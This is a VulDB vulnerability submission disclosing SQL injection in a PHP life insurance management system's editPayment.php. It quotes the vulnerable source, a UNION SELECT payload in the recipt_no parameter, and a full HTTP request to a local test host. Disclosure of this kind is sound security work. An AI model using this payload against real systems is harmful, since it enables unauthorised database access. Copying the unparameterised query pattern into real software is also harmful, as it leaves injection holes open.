提交 #435410: Project Worlds Life Insurance Management System v1.0 SQL Injection信息

标题	Project Worlds Life Insurance Management System v1.0 SQL Injection
描述	# SQL Injection vulnerability was discovered in Life Insurance Management System(editPayment.php) Official Website: https://projectworlds.in/life-insurance-management-system-in-php/ Version: 1.0 Related Code file: /lims/editPayment.php dbname=lims Payload: /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ <hr> ```php <?php include'connection.php'; $id = ""; if($_SERVER["REQUEST_METHOD"] == "GET"){ $recipt_no = $_GET["recipt_no"]; } $sql = "SELECT recipt_no, client_id, month, amount, due, fine, agent_id from payment where recipt_no='$recipt_no'"; $result = $conn->query($sql); echo "<div>\n"; echo '<form action="updatePayment.php" method="post">'; while($row = $result->fetch_assoc()) { echo "<label for=\"fname\">RECIPT NO</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"recipt_no\" placeholder=\"Your recpit no..\" value=\"$row[recipt_no]\">"; echo "<label for=\"fname\">CLIENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"client_id\" placeholder=\"Client Id..\" value=\"$row[client_id]\">"; echo "<label for=\"fname\">MONTH</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"month\" placeholder=\"Month..\" value=\"$row[month]\">"; echo "<label for=\"fname\">AMOUNT</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"amount\" placeholder=\"Amount..\" value=\"$row[amount]\">"; echo "<label for=\"fname\">DUE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"due\" placeholder=\"Your Due..\" value=\"$row[due]\">"; echo "<label for=\"fname\">FINE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"fine\" placeholder=\"Fine..\" value=\"$row[fine]\">"; echo "<label for=\"fname\">AGENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"agent_id\" placeholder=\"Agent Id..\" value=\"$row[agent_id]\">"; } echo "<input type=\"submit\" value=\"UPDATE\">"; echo "</form>\n"; echo "<a href='deletePayment.php?recipt_no=".$recipt_no."'>Delete Payment</a>"; echo "</div>\n"; echo "\n"; ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 88-135 of ) Injection parameter: recipt_no ``` GET /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk Connection: close ``` ![image](https://github.com/user-attachments/assets/84ad2cc6-395f-4204-862b-9e58c4458b47)
来源	⚠️ https://github.com/peteryang520/Cve-report/blob/main/SQLi-1.md
用户	Hantao Yang (UID 76989)
提交	2024-11-01 10時13分 (1 年前)
管理	2024-11-02 19時09分 (1 day later)
状态	已接受
VulDB条目	282903 [Project Worlds Life Insurance Management System 1.0 /editPayment.php recipt_no SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Do you need the next level of professionalism?

Upgrade your account now!